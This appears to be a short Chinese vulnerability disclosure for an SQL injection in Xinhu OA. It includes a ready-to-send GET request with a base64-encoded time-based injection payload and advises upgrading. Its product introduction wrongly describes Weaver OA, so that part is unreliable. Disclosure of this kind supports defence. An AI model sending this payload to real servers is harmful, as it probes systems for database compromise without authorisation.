漏洞披露-信呼-OA

更多网安漏洞复现,可前往无问社区查看http://wwlib.cn/index.php/artread/artid/16564.html

0x01 产品简介

泛微数字化运营管理平台OA为组织提供从"可信数字身份、电子化流程审批、个性化岗位信息门户、 知识文档管理、电子化签署到内外协同的业务管理"

0x02 漏洞概述

信呼OA办公系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

建议升级到最新版本已修复

0x03 复现环境

payload:

复制代码
GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
相关推荐
青槿吖25 分钟前
第二篇:告别XML臃肿配置!Spring注解式IOC/DI保姆级教程,从入门到真香
xml·java·开发语言·数据库·后端·sql·spring
北漂Zachary2 小时前
Mysql中使用sql语句生成雪花算法Id
sql·mysql·算法
2301_818732064 小时前
运行项目,sql报错无效索引 已解决
数据库·sql
徐子宸5 小时前
金舟软件-AI对话工具-华为网络数通-网络通信基本概念-20260313-未完待续
安全·web安全·网络安全·安全架构·华为网络数通·金舟软件·ai对话工具
Acczdy5 小时前
春秋云境:CVE-2025-64111
安全·网络安全
Y001112366 小时前
Day3-MySQL-SQL-2
数据库·sql·mysql
Eward-an6 小时前
Gemini认证工具创意开发(技术深度解析)
安全·网络安全·区块链
V1ncent Chen6 小时前
从零学SQL 07 数据过滤
数据库·sql·mysql·数据分析
Z1eaf_complete8 小时前
剖析目录遍历漏洞
安全·网络安全
华科易迅8 小时前
SQL学习
java·sql·学习